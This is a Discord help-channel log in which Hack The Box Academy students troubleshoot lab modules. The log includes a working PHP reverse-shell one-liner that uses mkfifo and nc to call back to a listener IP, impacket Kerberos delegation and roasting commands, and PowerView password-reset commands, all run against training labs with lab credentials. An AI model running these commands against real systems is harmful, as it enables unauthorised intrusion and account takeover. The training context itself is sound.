Hi guys

whats wrong with this

it worked before

just click the app

ok cool but why doesnt it work anymore? I found it easier this way. Whats up with my terminal?

also the app isnt opening for some reason

update or reinstall

i just use caido now

sudo apt update?

idk that 😅

feels like a better community burp

no rate limits

yeah and upgrade

ok cool ill try

thanks bro

im getting these errors

i cant upload images here for some reason

dm it

Nobody can tell me how to connected HTB-Corp network?

Wdym htb-corp, what module are you working on?

Ah missed your early message

You have to connect to the target machine first

I have connected already but I can't login into HTB-Corp with the password sentinal

Connect to the WPA-Enterprise Wi-Fi network named "HTB-Corp" with username "HTB\Sentinal" and password "sentinal". Once connected, locate the flag at the IP address 192.168.3.1. I am stuck here

Weird that it's sentinal and not sentinel

that's because it's the name of an HTB staff member

But meh i haven't touched the wifi stuff

they are probably the author of the module

No it is sentinal there the password

Neat

I did the configuration file opened it but it is not connecting... can't understand what's wrong....

Their emulation is working so slow that reminds me times when maximum operative memory was about 512 Mb

Why don't you connect via GUI?

I am connecting via GUI but it asks me for password

Haven't you said you already got a pass?

I know that I have a pass but it is not working

Which module is this?

Are you using the password just above the first question: rdp to <ip> with "<username>" and password "<password>"

Wi-Fi Penetration Testing Basics

Section would be nice

If it's the SA, there might be something not allowing you to connect

Connecting to Wi-Fi Networks

This one is via wpa_supplicant and config file indeed

I did the config file and still nothing....

Config file should active it itself right?

I just ran the commands and they work fine

Make the config file with the parameters in the question and run the commands from the "Connecting to WPA Enterprise" part in sequence

on login brute forcing module should i be trying to log in as Jane Smith

ok after the config file opening what other commands I should run?

Have you set your config file with the username and password provided?

sudo wpa_supplicant -c wpa_enterprsie.conf -i wlan0

It should connect you to the wifi network

guys I need help

I cant finish this part

https://tenor.com/view/youre-fucked-the-simpsons-magic-eight-gif-15834392

It helps if you give the module and section you're stuck on, we can't read your mind

Bro im trying to send it lol

i swear

You can't send images

ok Module 77, Section 726

Your account isn't linked

Module and section numbers mean nothing to me

ohh makes sense, I wanted to send a pic

If you wanna send an image you need to link your account via #welcome

so how do I explain?

Module name and section name on the page, i.e. Linux fundamentals - filesystem

That's not really an "exercise" as it is an example

its called "getting started"

I accidentally hit enter one sec im editing

You may not always be able to do everything

Im doing service scanning

And what are you having issues with

3rd question: List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

You're given Bob's credentials in the reading

In the format user:password

I wanted to send a picture for some reason even with steps its not working

yes it show "bob:Welcome1"

When connecting to a share, don't use -L

I didnt use it

ill send the line I started with

smbclient -U bob \\10.129.19.169\users

it got removed

the back slashes

Put a ` at the front and back of the command to avoid discord formatting

Yeah because \ is an escape character

in the code its 4 back slashes before the Ip and 2 before User

Yes

oh ok

I'm aware, but is that the available share you need to connect to?

Did you list shares before attempting to connect?

"smbclient -U bob \\10.129.19.169\users"

That's quotes

'smbclient -U bob \\10.129.19.169\users'

Not backtick (`)

Hello, on this server people help about cheat games or this is not this type of server

ill just copy you bro

Not that kind of server

Use your brain

If i have and issue whit me script can ask here?

there is game hacking though

Read #rules and #welcome to know what this server is about

probably not the one u looking for though

No

smbclient -U bob \\\\10.129.19.169\\users

Did you list available shares first

Oh okay thanks for the info

Where

That's a big hint for any server you join

challenges

on the site

Academy module

True jajaj

there are also challenges

yea with smbclient -N -L \\\\10.129.19.169

https://academy.hackthebox.com/course/preview/game-hacking-fundamentals
https://academy.hackthebox.com/course/preview/game-reversing--modding

bro im trying man

And was "users" one of the available shares?

do a -L first

to see what shares there are

yea with no comments on it

Also you can instead do //ip/share

And what error are you getting when you try and connect

Note the password is Welcome1

when I try to capture the flag text it says no command available

That's... odd so it sounds like it connects you

yea its weird thats my only issue

What is the command you're using to try and get the flag?

everything else is good

Is the flag in a subdirectory?

yes it is

cat flag.txt

Cat isn't an smb command

I can't even remember the payload I was using that was confusing me I'll just move on 😂

Try more flag.txt

oh ok

Or get flag.txt

ok ill try

get flag.txt should work

Then after you download it, exit the smb session and do cat flag.txt

I tried this it works

good job

"getting file \flag\flag.txt of size 33 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)" is my prompt

thx bro

I quit now and do this?

Yes

Just finished the SQLMap Essentials module, and got the final flag, but it won't accept it as the answer - flag looks legit. I tried logging in and out with no success. Anyone ever have a module that won't accept the found flag?

ok ill try now

see if there is no space in flag @quasi flint

no space before or after

also when u paste in the field

I even tried typing it in again

The flag can also be bugged and you are getting some weird character, does the flag look like l337sp34k?

It is leet speak

@fluid mist don't share the flag dumbass

my b brother

didnt know

Appreciate the help still

Didn't know flag sharing was against rules? 🤨

Use brain

I was too euphoric that I passed and forgot

100% my fault, never again

Thanks for the help anyhow. I will reach out to support I guess.

Hello everyone not really a modules question but I was wondering if any one has used the annual subscription and is the step by step question guide worth it I haven’t needed it yet? Thank you for any opinions.

It's ok to help you get unstuck or to give an alternate perspective on how to solve a problem

The authors like to rely on msfconsole/proxy for their pivoting stuff (which is interesting) but I prefer using ligolo

Appreciate it

But i wouldn't rely on the walkthrough to do much explaining beyond what was in the reading

Awesome information thank you

They had a typo in the flag, one of the leet speak words didn't look right so I flipped it from a 'a' to '0' and it worked.

Kerberos Attacks § Constrained Delegation from Linux

The ticket retrieved by :
impacket-getST -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd$' -impersonate Administrator
is giving me KDC_ERR_PREAUTH_FAILED when I try to use it. Why?

bad password or user?

Nope, actually it was failure to leave /etc/hosts alone. Specifying -dc-ip and -target-ip instead of editing configuration files fixed the problem.

Hi guys, I need help accessing hackthebox to do labs. I logged in and went to labs and this appears, any ideas?

See #welcome

network error

No idea since you can't post images here

issue with Debugging section of Malware Analysis:

sudo inetsim
INetSim 1.3.2 (2020-05-19) by Matthias Eckert & Thomas Hungenberg
Main logfile '/var/log/inetsim/main.log' does not exist. Trying to create it...
Error: Unable to create main logfile '/var/log/inetsim/main.log': No such file or directory.

did all the preceding steps correctly...suppose I'd have to set this up on one of my own VMs as the module seems to suggest it won't work properly on a pwnbox?

you transfer it from your machine

just download it on your machine then copy it to the rdp session

yes that can work too

i just copied and pasted it

I'm doing skills assessment for cme , i connected to the target environment using chisel client , when I'm doing anything using proxychains in the target environment I'm getting a socket error or timeout

sounds conifugration related

Hello! excuse me:

for footprinting module SNMP section i get the question:

"Enumerate the custom script that is running on the system and submit its output as the answer"

i am really confused

what is it really asking us to do?

You enumerate the snmp service using the methods provided

It'll be obvious once you see it

i did :P i did the other 2 questions, but like am i supposed to put the custom script name as an answer?

submit its output

because what i understood it now is there is a custom script running aka process

and the number of processes running is soooooo big

The script had already run

Well one of the tools narrows your field of view to the important bits

right, but my understanding then is correct, it's a process that is running

Nope

It's a process/script that had already been run and logged on the server

hmmmmmmm, thing is, when you say "submit its output as the answer"

Because it's output is logged

yess

ah right hmmmmm

Running implies that it is currently active

i didn't know that SNMP registers logs

That's literally what snmp is for

Simple Network Management Protocol

i thought it monitors online devices hmmmm

Yes, it monitors and logs

it's just the lack of real use of one

thank you!

Be a shitty monitoring tool if it didn't log what it monitors

Don't ya think?

well, i don't quiet understand what exactly it's monitoring

as i said, i lack the experience with the service

It's monitoring for activity on the device

interesting, okay thank you, but hmmmm, would that mean

SNMP is used a lot with IDS or something?

It can be

Usually it's installed/running on routers/switches/servers

also i have a question, sometimes i see a question and i want to do something, but maybe some tool wasn't discussed, are we supposed to go online and search for such tools?

It's not often something like that happens

sure, right, but it did happen i forgot what tool i had to search for

But getting information from multiple sources is helpful

but is that an intended goal? is that considered cheating?

How would it be cheating?

well, it makes the question easier since i am using a tool that wasn't discussed

for me, it feels a bit like cheating, but am i to learn by myself?

Most of the times the tools required are what's discussed, but they aren't the only available tool for the job

so, am i encouraged to do such a thing? because i love doing that, but i end up usually contraining myself to what was discussed in a module

ppl say if we do AEN blindly, we would be considered prepared for CPTS? but what if i spend a 4-5 days doing AEN with around 10 hours per day...

constraining*

Understand where your methodology is breaking

You can constrain yourself if you want

The pivoting module doesn't go over ligolo-ng but that's been my goto for pivoting

It doesn't hurt to learn more tools if you find one that does the job better or just works better for you

excuse me @fathom pendant sometimes, the OIDs has weird random number values, what do they represent?

Utilize google

absolutely, hahahaha, sometimes i just find it better to talk with someone if i had someone

Can't be bothered to explain it

No worries! i will, thank you!

Especially since they're not necessarily random

Weird question but why does this curl PUT not work?

||curl -X PUT http://94.237.59.180:41735/api.php/city/fort_worth -d '{"city_name":"zag", "country_name":"zag"}' -H 'Content-Type: application/json'||

For context I'm trying to figure out how to refer to a city in a header obviously I cant use an empty space

The city_name stored in the table is "Fort Worth" so my assumption is that the space should be replaced with an underscore and no caps lock

Because that's not how the api works

I tested this with a city name without a space and got the expected result

This is CRUD no?

Also make sure you know how it's calling the endpoint

Are you sure it's calling it as fort_worth

If you look it up as "fort_worth" yes

I cant upload the image but it returns the JSON string

With the full name, country

Did you try with -X update?

I mean I could but that would create the entry on the assumption that the entry does not exist

but I'm specifically trying to figure out how to refer to an entry that has a space in the name

I really thought it would be an underscore and I'm struggling to figure out how to google this question

(I mean I did google it but was simply told "_")

I know I'm going to run into this issue in the future, at some point, and would love to know why this is not working when the endpoint is specifically "fort_worth'

but when used with CRUD API is not working, but will if it lacks a space character (hence me being able to modify city names like london to something else with the exact same parameters)

I must be missing the obvious here. Footprinting medium assessment lab;

I've got the solution infront of me, copied exactly the format over to pwnbox (tried both written and pasting password) but i seem to fail to reach the devshare that I need... any thoughts/help?> pls

where are the recommended boxes in the end of each module ?

can someone snapshot the location ?

the only thing i see is the Academy X HTB Labs universe

can anybody tell which option is used to generate standalone payload in msfvenom?

Hello! Is this a right place to ask questions about module "ACL Abuse Tactics" (related to CAPE cert)?

yes

When I try to execute the Set-DomainUserPassword command (copied from listing no. 3 in this module), I receive the warrning:

WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'.

Any idea why? I don’t see any typo or similar issue there.

For clarity, I understand what the message means, but the entire module is designed for this user. So, if he don't exist, I'm not entirely sure how I am supposed to complete this module and do the exercises.

what was your full command

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force Import-Module .\PowerView.ps1 Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

command looks fine to me..

have you tried restarting the machine

you mean the "target"?

yes

will check once again now

same with new target

"unable to find user 'damundsen'"

Since I’m new, I’d like to ask if there’s another place where I can report this?

on the modules itself there is small icon on the bottom right, there u can create a ticket

but before that I would say restart the target, and between the restart wait for 5 min

only bringing this up since you mentioned you are new: do the exercises mention this user specifically? I don't have this module to confirm. Sometimes the environment of the exercises does not match the content.

@urban elk Hi, I’m fully aware that this might sound like a newbie question, but yes, this module specifically revolves around this particular user, which is why I’m asking.

just covering the basics. Hope you get some help

If I buy a htb academy giftcard how can I activate it and can I use it to buy accademy one month subscription?

have you tried prepending the domain ?

for now I'm going to the next module, I've already wasted too much time on this one

do not join @minor cosmos

this is a scammer

don't, clearly not

lol

that was close

ok, no more s**t posting, Thanks for help @urban elk & @storm elk

HTB won't post links to separate discords

You can use the DN or set the Domain flag

Hello can anyone tell me how to subscribe in the student plane , if I don’t have a student mail they don’t provide us with an email

Unable to find user 'INLANEFREIGHT\damundsen'

Did you use the DN or the Domain flag? You can also use Get-DomainUser in the Identity

Check if you can run Get-DomainUser damundsen separately

Then try changing to the full command

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

If you can’t find the user for whatever reason even after querying for the user only, I’d suggest restarting the env

You can also dump the users in Linux to see if there is any problem with the environment or if it’s just something with your Windows session

Yes

Your secpassword variable is wrong

You need to specify the password for the user wley

found password from previous modules but this just not work, will back to this later

what happens if im in the middle of a module and my student subscription runs out?

the module will get locked

@autumn pilot something is wrong, wmiexec.py inlanefreight.local/wley:'<here password with 4 as last character>'@172.16.5.5

result: rpc_s_access denied

I thought they were available even after
Does this happens to annual subs as well?

Not my case, since I got monthly and there are only 4 modules to unlock, but it’s always good to know

completed modules will be yours forever

if you bought them with cubes - then they are yours too

I meant if you’re in the middle of a module unlocked by annual subscription

hello

hello

hi

Information Security Foundations. And guides and tips for the information. I’m currently on Windows Command Line . Passed Linux and Windows Fundamentals but that’s because there were guides on YouTube that explained thoroughly. If anyone can get advice or tips that’ll be great.

new module

No

uh, okay

That moment when you solve the entire module and you’re just sitting there like fuck that was hard

Injection Attacks?

@acoustic owl can we attack inlanefreight.com or the lab is not fully done yet?

you may only test inlanefreight.com within the scope given to you by the module

Ah

So you can't freestyle?

In general, that's tough

no, it's a public website. can't go out of scope

Damn, it's sad it's not up for general training like XSS, SQLi but limited only by the OSINT module

i think it's better that way

Nah

I was able to dig up a report from 2022, it featured AD attacks and stuff

Like...an official HTB document

It's def used for other stuff than OSINT

yea it's probably used in AD Enum & Attacks... for looking up domain info

There

yea this is from the Documentation & Reporting module

none of this was ever actually a part of inlanefreight.com

UGGGGH, damn it could have been very fun lab

But they chose not to

😭

you already have AEN

plus making vulnerable web apps public and indexable by google isn't a good idea anyway

AEN?

Attacking Enterprise Networks

full fledged network

Ah fr?

No way, haven't started it

it's the capstone module for the Pentester Path

Ong

They should make ultra labs or smth, sometimes it feels like the pro labs are quite small

it's bigger than that sample report you dug up.. which i'm going to delete since that's spoiling Tier II module content

Apologies, but it's open source

which it shouldn't be.. you should report it

/spoiler

It's indexed by google

Submitted it tho

Yes i just finished now

I really got my ass handed to me

Web app is my weak point. Doing cbbh then oSCP july, just wanted to take a pity stop

Pitt stop*

Hey Can you help me with this problem. Questions

Answer the question(s) below to complete this Section and earn cubes!

Target(s): 10.129.197.240 (ACADEMY-NIXFUND)

Life Left: 91 minute(s)

SSH to 10.129.197.240 (ACADEMY-NIXFUND) with user "htb-student" and password "HTB_@cademy_stdnt!" I was trying to connect but to ssh . But it is not connecting. I am solving Academy Modules

Hola hola buenos días algun modulo para hacking etico en español

I believe english is encouraged... and required in my case. 🙃

What module and section are you on?

Solo Ingles aqui #rules numero 7

Gracias

I've a problem with the pwnbox

In modules the commands don't match the answers

Examples won't always match what you'll do/see in output

If they did, there would be no reason to have the exercises as you could cheat your way through

I know my question is for example in linux module there was a question about the kernel version and when I did the command, copy and paste the output it didn't work

Because there's a target you need to ssh to

The pwnbox != the target

Can I do it all on the pwnbox or I've to use openvpn

You can connect to the target from the pwnbox

The pwnbox is automatically connected to your selected vpn region

Thanks for helping, I appreciate it

I always push for people to use their own vms, more control over tools installed, persistent storage, can utilize it for more than htb

I'll definitely try this, I guess it would need openvpn, right?

Yep

But vbox and vmware both have drag & drop capabilities

So you can download on your main os and drop the vpn file into your vm

More easy and better

That is good

I suggest using netexec in the future

But it's a full error, so I suggest investigating further with evil-winrm

Also deleting message bc potential spoiler

when i do evil-winrm he shows me also a error message

i think is the connection to that machinbe

Then restart the machine, wait a few minutes, then attack/connect

Kerberos Attacks § RBCD from Linux

impacket-rbcd -dc-ip 10.129.205.35 -t DC01 -f ATTACKER inlanefreight\\carole.holmes:Y3t4n0th3rP4ssw0rd
\Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

usage: rbcd.py [-h] -delegate-to DELEGATE_TO [-delegate-from DELEGATE_FROM] [-action [{read,write,remove,flush}]]
[-use-ldaps] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
identity
rbcd.py: error: the following arguments are required: -delegate-to

The module examples use an outdated version of impacket, so what's the updated syntax of this command?

I don't know where I have to ask it but can anyone help me in private to resolve EscapeTwo of HTB, pls ?

Update: was using a completely different rbcd.py script that I had to download; fixed now

No, there's #1327698295102898246 you'll need to read and follow #welcome to access

thanks

hi chat

This isn't #general , read and follow #welcome to be able to chat there

how to solve this, "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."

module : nmap scripting engine

Use scripts to enumerate the server

I suggest starting with the ones in the example first

ok bro will update if it works

The module doesn't show using this as an example, it specifically says to use rbcd.py

that said, your error shows exactly which argument is missing

I had the exact same issue yesterday in the active directory module. I had to actually type the password, copy & paste wouldn't work.

Yeah, figured that out when I downloaded the rbcd.py from GitHub.

i am on module "Getting Started", "nibbles" page
listen on my port, upload my image.php
curl the php
but i don t have the reverse bash
some one can help me ?

Did you put your tun0 ip and port in the php?

yes

<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 /tmp/f");
system('id'); ?>

and
sudo nc -lvnp 2727

the id line don t write out

That's fine

But does it connect

Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:2727
Ncat: Listening on 0.0.0.0:2727
Ncat: Connection from 10.129.120.222:58554.
/bin/sh: 0: can't access tty; job control turned off
$

You're connected

Don't worry about the id not printing

if i type some thing no return

Wdym "no return"

You may need to upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/sh")'

i follow the curse :
$ python -c 'import pty; pty.spawn("/bin/bash")'

but nothing print
and no prompt ($)

i can t post screen

If you wanna post screenshots follow #welcome

Press enter again

Also best to specify python3

it s like no return from distant

i try reset target

3 times

try entering a command

hi am having issues with the vm pwnbox (hosted locally):

$ ncat -nv --source-port 53 10.129.2.28 50000
bash: ncat: command not found

i tried upgrade /installing both netcat traditional and openbsd

Isn’t it nc > /tmp/f?

What about manually

ho my......
so many time and change

loose the second ">" when i insert port .............

try saving this and btw you forgot the > before the /tmp

<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 > /tmp/f"); ?>

yes working ans chalence done

thanks

my eyes are bored

thanks , reinstalled all missing pacjages

Anyone else getting kicked off vpn over and over

well off my SSH

Change vpn regions

that didnt help killed my connection right away ill try TCP

How are you all

By the way, I'm new with you

Are you welcome?

I am very welcomed

Well yeah changing vpn regions will kill the connection...

Also make sure you only have one vpn running

I want to know if this group has people who can teach me how

I know i waited got the new file, connected to that , put my ssh in got connected ran netstat and it dropped

This isn't general, read and follow #welcome

yeah right now i only have openvpn running

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

even my pwnbox ssh is timing out

Don't run pwnbox and your own vm at the same time

didnt try to as mentioned it dropped my VM so i tried pwnbox

ill reboot my pc that fixes all the things

No one is gonna hold your hand through learning @viscid patio read the linked article

🙏🏻Can I talk to one of you in private and explain to me and ask him questions?

No

If you need help with an academy module you can ask here

Someone did the footprinting ftp page not the lab ?

?

What's your actual question

https://dontasktoask.com

Is there a way to show the flag.txt ? I got both question but i dont feel right to have tried something and got it

Can someone just tell me where to start learning hacking

Wdym show it?

I want steps?

I linked an article earlier bud

Read that

If it works then don't feel bad

Each scenario will be different, the article is a good starting point to understand. And atp I wouldn't wanna take you on even if you paid me

The only thing i see when i go on the ftp is ftpuser ftpuser there a file called flag.txt i got it but hiw would i have known if it werent for the question that file was there

If you can't be bothered to read an article titled "beginners bible" then you're just gonna infinitely frustrate me

ls

You can ls and dir in ftp

I did a ls -R 3ven ls but it only show ftpuser

You can cd

¯_(ツ)_/¯

I didn't say you could dm me

@fathom pendant Sorry

I've given you all the basic info

And at this point you sound like a leech that's just gonna go "and then?" After being told to do something instead of doing any legwork yourself

Htb academy has plenty of learning modules, and even an intro to pentesting module

Can I speak?

Isn't just better to go for the basic paths like cracking into htb that give you things to learn to really start ?

This channel is for help with the htb academy modules

@fathom pendant my bad iwas just dumb and no observant i forgot the file name is at the end

I just want the direct site that I can learn from

Mood

https://academy.hackthebox.com

That's one site you can learn from

@fathom pendant Thank you very much ♥

It's not 100% free

Hey all... noob here lol

But the beginner modules (tier 0) are all free

@fathom pendant Should I open the link you sent me on Google? Or there is a private, protected site

?

The link can be opened in any browser

I said maybe it should be opened in a protected location like Tor

It doesn't need to be

And Tor is useless if you're gonna be signing in to an authenticated service anyway

Are you a manager here?

No

You are good at treating yourself and being kind 🌹

@fathom pendant

Please don't @ me

Your account is beautiful

The important thing is that I want someone here to help me, because there is someone with a white heart who can teach me in private 🙏🏻

i doubt you'll find that here, this channel is for discussion about HTB's Academy platform, so most people are learning from that, not private tutoring

where I can ask about pwnbox time... I dont have any time left... :/

This says it's for labs, but I think it applies to academy too:

• Free Users have a single two hour session of Pwnbox available for the life of their account, as a way to test out it's features. Free users also have limited internet access, with only our own target systems and GitHub being allowed.

• VIP users have a limit of 24 hours per month to use their Pwnbox. This limit gets renewed with each month that you renew your VIP Subscription

• VIP+ users have unlimited use of Pwnbox.

https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox

hi I have been stuck on attacking SMB service section from Attacking Common Services module for several days. I got the the rpcclient part where I'm logged in but none of the commands work. This is for question 3. I already completed questions 1 and 2 so I don't need help with those.

can someone help me out here? I took a few days off because of the fires

but a few days ago I tried for like three days

can someone help me out with next step?

I know I can log in as the right user via rpcclient and I know which SMB ports are open but other smb tools don't work for logging in only the one tool

I hope I'm not spoiling anything I'm trying to be vague.

I need to know how I get the commands to work via RPC

can someone DM me?

@cloud urchin I cant use openvpn as an alternative?

you absolutely can use your own VM with openvpn, it's probably a better experience doing it that way too.

that kerberos skills assement was about 1000% times easier than i was expecting

im confused, didnt i kinda give you the answer a few days ago?

if you can answer questions 1 and 2, 3 should be no problem at all

you found the share but didnt check it?

I think one of my brain cells dropped a packet, when it says local VM is that referring to the PWNbox or the VM i connect to via SSH? Either way those are not local

depends on the context

It is highly recommended to set up our virtual machine (VM) locally to experiment with it. Let us experiment a bit in our local VM and extend it with a few additional packages. First, let us install git by using apt.

that would be your personal VM

Ok sounds like its time to spin another one up

pwnbox already has what you need

but if you use kali or parrot the default settings should be fine

Ok just another confusing line in these trainings. It makes it sound like the practice of installing it is a good idea (which i think it is) but if its already done and I dont have to start my own VM

ok I know I think I am missing some stupid detail due to having a bad week

this week has been very stressful

"and I dont have to start my own VM" wydm by this

I mean I have had vacations kind of but a lot of evacuating and driving all over the place

OS Management Linux Fundamentals Package Management page first line below list of commands https://academy.hackthebox.com/module/18/section/72

its just showing you how to install stuff

np ill move on, I have parrot OS VM on my PC was just going to start another but not gunna spend the time trying to get mine setup if their's is already working appropriately

the tools shown are already installed by default, thats just for any future tools you want to install

ok

can I DM with someone in like an hour? I think I need to start the section over and eventually I think I will need someone to help me through the last step which is what I think I'm at

or maybe I can DM someone tomorrow night? is that possible?

Kerberoasting from Linux

What is Adam's password, a Kerberoastable account?

I am not getting Adams account
||

 impacket-GetNPUsers inlanefreight.local/htb-student:'HTB_@cademy_stdnt!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Name         MemberOf  PasswordLastSet             LastLogon                   UAC
-----------  --------  --------------------------  --------------------------  --------
amber.smith            2023-03-30 06:40:23.135840  2025-01-17 14:42:20.567899  0x410200
jenna.smith            2022-10-14 05:00:00.581111  2025-01-17 14:42:20.739757  0x410200
carole.rose            2022-10-14 05:00:03.377990  2025-01-17 14:42:20.927255  0x410200

||

NPUsers is for asrep ig

lol

i just noticed that

I got the the public key to log in via ssh and I am trying to log in after importing it and it won't let me

I am trying to ssh in as the user. this is for question 3 of same module I have been on

you can't use the public key for ssh you need the private key

ok I think I have private key actually

its id_rsa

its denying permission to log in based on having too much permissions

what is the right chmod command to make this work?

do I just play around with permissions?

maybe it is private key because it says permission denied (public key)

I'm confused

I have file saved on pwnbox tho

chmod 600 for a private key

first couple results in google explain it

https://superuser.com/questions/215504/permissions-on-private-key-in-ssh-folder

wait I logged in

I have the flag

I finished the section

thank you for your help

holy moly Using Web Proxies: ZAP Fuzzer is probably the most broken lab i've come across so far

i've had to reset it 4 times just for 2 separate services (even the flag) just to show up using the same command😭

I feel like we went through this before

No, you don't

aww shit here we go again

The big thing is it looks for group and other perms

I precisely remember telling him to put it in his notes

oh mb I always thought u needed to make them executable

If they are anything other than 0, ssh says "something isn't right"

Why does a file that gets read need to be executable?

yea mb, Idk why I was doing that 😂

less than a month

@quasi wave get your shit together

marcielee will remember this

https://tenor.com/view/déjàvu-drift-anime-initial-d-car-gif-17211916

https://tenor.com/view/approximate-adventuretime-knowledge-gif-4730015

I mean I don't always remember to change the perms but when ssh says so: I quickly realize my stupidity

alert! You're a fuckin idiot lmao anyone can read and access your ssh key nerd

Hi, whats a good way to actually remember the things you learn from htb. I take notes but don't visit them (it's just as if I'm collecting notes but not returning to them). So when I have like 15 sections (and subsections within those sections) of notes, whats a good strategy/timetable to revisit the notes in a breathable manner?

Simply: dont take notes while reading, take notes after the fact

And revisit those notes

I like revisit: 1day 1 week 1 month

Make a sheet or something , I use notion automation to tell me which notes to review

And my review doesnt consist of reading the notes it consists of recreating it as much as possible

(Mainly cos my notes are mind maps)

so like read everything and take notes from memory, that does sound better tbh

is there something like that in Obsidian?

I use Obsidian

There's probably a plugin

ahh ok Ill have a look

what does notion automation do for you in this case?

Ill try find a relatable plugin

A lot of what I remember is from helping others

Also a good way to engage with stuff isn't "what is the right way," it's ruling out "why is this the wrong way"

yeah talking does help tbh. I wish I could be on the level to help people, hopefully one day

Whenever I make a note I make a page in notion which saves its date, I have a view in notion which filters for when the date today is equal to the date created + 1d/1w /1m

thats a good approach

ohh I see

Strats i learned in ap-psych 10+ years ago

oh nice, Im assuming ur from the states?

Yep

nice

I did a level psychology like in 2016

Also makes it so I only have to review notes from at most 3 days , unlike when I was doing flashcards, oh God

was just memorising a shit ton of case studies lol

😅

The benefit to explaining to yourself why the wrong answer is the wrong answer is it not only reinforces the right answer, it affirms your knowledge around the subject

This is generally more applicable around MC questions

ahh I see

But can be applied to methodology

https://tenor.com/view/write-that-down-taking-notes-school-universities-university-gif-17937210

sounds like it

Scan, find a web page -> rule out which tools to utilize

I mean everything is multiple choice if you reframe it to be

Enumerate page -> rule in which tools are a better scalpel

Also did you just describe process of elimination in a way that made me think it's something else?

Hacking is just a problem to solve, eliminate where you can to narrow in on what you should try

It's why I'll engage with someone using a wrong tool or doing something odd with a certain tool with "why?"

It allows for the building of the critical thinking aspect

Shifting from "well this is the tool I'm meant to use" to "well x framework is here and y tool is best for it"

Who’s taking cpts next week?

Shortcuts i took in web modules:
Public_ip:port == no revshell

I feel so stressed i need to be confident 🤝

Learned the hard way recently that certipy had shadow creds attack

This whole time I've been using pywhisker pkinit, where venvs are pain

Plenty of people probably taking it that aren't in the discord

Yep, understanding what you're attacking allows you to ask better questions, or formulate better Google queries

I know , but some tips might help

You get 2 attempts and feedback, take full advantage

Don't overcomplicate it, everything on the exam is in the course. And you can and will get stuck, don't let it discourage you

I have quick question i cant do pro labs , what do recommend for others free labs?

Thank you for your support🤝❤️

Well can't recommend any free active labs due to spoilers and such

Theres free prolabs

But the best bet is to review the course material

Full house is full atm afaicr

I will redo the skill assessment?😍

Make sure you understand why a tool was used, what situation a tool is used in, and things of that nature

Try and tackle some of the skill assessments in a different manner than you did initially

This is a good tip🫶🏻

Make sure you know of backup plans of how to attack something just in case your go-to tool fails

Do labs already you're clearly omniscient 🤣

I like that i saw people failed because of this one

Troubleshooting tool issues sucks, even more when you're on a time crunch

👍🏻👍🏻👍🏻

Therefore: write your own tools so you know it well enough to troubleshoot

Got top 5 😁

🔥🔥🔥

noice

I see you had some issues in #1234357888114364508 lol

man's so locked in he can see all the errors

I get curious when it lights up

And see if it's a skill issue or actual issue

I really like when modules have the hard af question at the end designed to make you use what you've learned cumulatively

I really hate these kinds of questions where it's just one-off knowledge that I can google

Meh

It's why I love being able to just fuck around in my cybersec classes I just guess 90% of the answers and I'm right 98% of the time

The other 2% is either
1] i didn't read
2] i don't know

why does the privesc module suck so bad

Because you didn't eat all your veggies growing up

fair

i am a little weakling

https://tenor.com/view/popeye-sailor-spinach-muscle-gif-5982865

shits been downloading for the past 10 mins smh

Why not just git clone it?

had errors when I tried

Skill issue

😦

u can do it!

Try using --depth 1 so it doesn't clone as much of the commit history while still cloning all the wordlists. Works for me.

thanks

ghost ping 👀

Sorry, deleted reply because I had to re-read your post to see the context of it.

Working on enterprise network right now on the first pivoting chapter, having some trouble getting proxychains to work. I'm using -D 9050 so it's set to what's in proxychains.conf at default, but it doesn't follow the routes when i ping the hosts or use nmap

This is why I use ligolo

ah-

Ping and fping work just fine

It's not the fact they can't go through ports, it's the protocol in use that's the issue

Socks proxy is annoying

probably because they don't specify Pn though for some reason

Don't share screenshots of modules above tier 0

yeah just saw that

Also you should be doing the module blind if you're doing the cpts path

As everything you'll encounter will have been taught in some form in the modules preceding it

true!

Blind == spin up the target, don't even read questions

Since the module itself is a walkthrough

How do I display filtered ports in an Nmap scan? I know that my target IP has certain ports filtered (reason = no response), but when I run a -p- scan, it just won't display them and I can't find an option to make that happen.

I don't think -sn scans ports

"No response" doesn't necessarily mean filtered

Well, scanning the individual ports definitely said they were filtered, so that’s what I’m referring to.

What module and section are you working on?

Nmap - Firewall and IDS/IPS Evasion (Hard Lab)

I did finish it, but I had to lookup the forum discussion for a nudge, since the port I’m supposed to be connecting to doesn’t appear in a regular Nmap scan (nor is it specified in the challenge description)

Utilize some of the techniques, like source port

If you read the ids/ips evasion section it refers to dns

Yeah finding the technique was not the problem there

Instead of specifying the exact port [as in the example] it should show up with -p-

Except it didn’t (I tried multiple times)

Yeah and the technique specified using a specific source-port

That bit isn't mutable

It's due to common firewall misconfigurations

Also if you trip the detection system you're locked out of interacting with it anyway

It's not a t0 module iirc also sharing ss of a skill assessment is spoiling

Point is; try a -p- scan with source port

Also do a Syn Scan

Source-port btw isn't the -p option

--source-port tells nmap to use a specific port from your device instead of arbitrary one that a normal connection would do

